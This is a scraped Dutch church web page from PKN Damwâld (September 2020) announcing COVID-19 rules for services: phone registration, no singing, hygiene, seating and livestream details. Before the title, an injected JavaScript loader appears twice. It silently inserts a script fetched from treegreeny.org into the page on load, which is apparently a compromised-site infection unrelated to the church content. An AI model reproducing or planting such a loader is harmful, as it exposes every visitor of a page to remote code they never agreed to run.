;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitnodiging om de erediensten te bezoeken - PKN Damwâld

Uitnodiging om de erediensten te bezoeken

Gepubliceerd op: dinsdag 29 september 2020

Op maandag 28 september zijn de nieuwe richtlijnen in verband corona aangescherpt. Wij volgen die richtlijnen en dit heeft ook consequenties voor een aantal kerkenzaken. Onderstaand geven wij die aan.

Gelukkig mogen wij als kerken nog steeds samenkomen in erediensten. Dat is een voorrecht dat ons geboden wordt en daar zijn we God dankbaar voor. U bent dan ook van harte uitgenodigd om onze kerkdiensten bij te wonen. Het is ook nog steeds veilig, omdat de kerken steeds grondig worden gereinigd en ontsmet.

Bernetsjerke:
De Bernetsjerke en oppas wilden op 4 oktober weer starten. Vanuit de overheid wordt gevraagd allerlei activiteiten niet uit te breiden. Vandaar dat wij wachten op de persconferentie van 19 oktober en hopen, als de maatregelen verruimt worden, vanaf zondag 25 oktober te starten.

Zingen tijdens de eredienst
De PKN heeft een dringende oproep gedaan om niet meer te zingen. Zingen geeft namelijk een groter risico op besmetting. We gaan dit opvullen met orgelspel, eo filmpjes, etc.

Opgeven
We nodigen u van harte uit de erediensten bij te wonen. Er komen gelukkig steeds meer gemeenteleden bij de erediensten. Als u de eredienst(en) wilt bijwonen, moet u zich per week vooraf opgeven voor de dienst van de komende zondag. Dit vanwege mogelijk contactonderzoek. Dit kan op woensdag-, donderdag- of vrijdagavond van 19.00-20.00 uur uitsluitend via telefoonnummer: 06-14751932. Alleen de mensen die zich hebben opgegeven kunnen de dienst bijwonen. Indien u na opgave toch klachten krijgt, of alsnog niet kunt komen, hoeft u zich niet af te melden.

Dankdienst:
Voor de Dankdienst voor gewas en arbeid op woensdag 4 november kunt u zich voorafgaand op maandag- en dinsdagavond van 19.00-20.00 uur opgeven op bovengenoemd telefoonnummer.

Hygiëne
Heeft u klachten of bent u in contact geweest met iemand die corona-klachten heeft, blijf dan thuis. Bij binnenkomst kunt u de handen ontsmetten, met het aanwezige ontsmettingsapparaat. De garderobe kan niet worden gebruikt, u moet de jas mee naar binnen nemen, daar is genoeg ruimte. De toiletten mogen niet gebruikt worden en zijn gesloten.

Het gebruiksplan voor de erediensten ligt in de kerk op de tafel bij de entréé. Hieronder volgt een samenvatting van de “spelregels”.

Begeleiding
Bij binnenkomst wordt u opgewacht door begeleiders. Deze leiden u via vaste looproutes naar uw plaats. Er zijn geen gereserveerde plaatsen aanwezig.

Kerkgangers uit één samenlevend gezin mogen bij elkaar zitten. Overigen zitten met de afstand van 1,5 meter uit elkaar. De kerkbanken en stoelen zijn dusdanig geplaatst dat de 1,5 meter-norm is gegarandeerd.

Livestream
Zoals tot nu toe gebruikelijk is, houden we de ochtenddiensten gezamenlijk in de Ontmoeting. Deze diensten kunt u ook live meemaken via de livestream via www.pkndamwald.nl/live. Tevens kunt u de dienst beluisteren via Kabel Noord, kanaal (1)1956.

Vanuit de Ikker kunt u ook de dienst beluisteren via Kabel Noord, kanaal (1)1954

Overig

Op de website kunt u het volledige protocol nalezen. Er is één voor de Ikker en één voor de Ontmoeting. Wij kunnen ons voorstellen dat u vragen heeft. Belt u dan gerust met een van onderstaande contactpersonen.

Wij hopen dat u niet ontmoedigd wordt door alle regels. Natuurlijk gaat alles momenteel nog “anders als anders”, maar we hebben de mogelijkheid om samen te komen in het huis van onze Vader. Oant sjen!

Scriba Gereformeerde Kerk                                                              Scriba Hervormde Kerk

Jan Reitsma: 0511-421542                                                                Geralda Teertstra: 0511-424766